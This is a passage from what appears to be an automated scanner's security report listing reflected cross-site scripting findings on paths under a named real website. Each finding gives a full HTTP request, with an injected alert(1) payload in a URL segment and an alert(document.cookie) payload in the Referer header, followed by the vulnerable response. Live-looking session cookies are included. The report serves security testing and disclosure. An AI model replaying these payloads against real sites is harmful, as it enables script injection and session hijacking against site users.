Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/js/x_core.jsb794b"-alert(1)-"c38b7601809";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.360. http://www.tucows.com/includes/js/xdocsize.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/xdocsize.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80391"-alert(1)-"2da181f97ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes80391"-alert(1)-"2da181f97ad/js/xdocsize.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32133

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes80391"-alert(1)-"2da181f97ad/js/xdocsize.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.361. http://www.tucows.com/includes/js/xdocsize.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/xdocsize.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e49a"-alert(1)-"bcc9c43802 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js8e49a"-alert(1)-"bcc9c43802/xdocsize.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:44 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/js8e49a"-alert(1)-"bcc9c43802/xdocsize.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.362. http://www.tucows.com/includes/js/xdocsize.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/xdocsize.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d536b"-alert(1)-"a064303b2a1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js/xdocsize.jsd536b"-alert(1)-"a064303b2a1 HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:55 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32460

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/js/xdocsize.jsd536b"-alert(1)-"a064303b2a1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.363. http://www.tucows.com/includes/js/yetii.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/yetii.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload beba4"-alert(1)-"b69b27dceac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includesbeba4"-alert(1)-"b69b27dceac/js/yetii.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:41 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32163

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includesbeba4"-alert(1)-"b69b27dceac/js/yetii.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.364. http://www.tucows.com/includes/js/yetii.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/yetii.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 873ff"-alert(1)-"ccf5c4f6b2d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js873ff"-alert(1)-"ccf5c4f6b2d/yetii.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:50 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31771

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/js873ff"-alert(1)-"ccf5c4f6b2d/yetii.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.365. http://www.tucows.com/includes/js/yetii.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/yetii.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd99a"-alert(1)-"3c47dc9c7d2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js/yetii.jsdd99a"-alert(1)-"3c47dc9c7d2 HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:23:03 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32256

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/js/yetii.jsdd99a"-alert(1)-"3c47dc9c7d2";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.366. http://www.tucows.com/includes/themes/03BlueMeany/style.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/themes/03BlueMeany/style.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f648"-alert(1)-"92dc0f19f81 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes5f648"-alert(1)-"92dc0f19f81/themes/03BlueMeany/style.css HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31991

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes5f648"-alert(1)-"92dc0f19f81/themes/03BlueMeany/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.367. http://www.tucows.com/includes/themes/03BlueMeany/style.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/themes/03BlueMeany/style.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fbe1d"-alert(1)-"607a37a5993 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/themesfbe1d"-alert(1)-"607a37a5993/03BlueMeany/style.css HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:55 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32590

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/themesfbe1d"-alert(1)-"607a37a5993/03BlueMeany/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.368. http://www.tucows.com/includes/themes/03BlueMeany/style.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/themes/03BlueMeany/style.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e65b"-alert(1)-"157ede0dbba was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/themes/03BlueMeany8e65b"-alert(1)-"157ede0dbba/style.css HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:23:03 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32182

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/themes/03BlueMeany8e65b"-alert(1)-"157ede0dbba/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.369. http://www.tucows.com/includes/themes/03BlueMeany/style.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/themes/03BlueMeany/style.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b311"-alert(1)-"4061c82776f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/themes/03BlueMeany/style.css6b311"-alert(1)-"4061c82776f HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:23:09 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32209

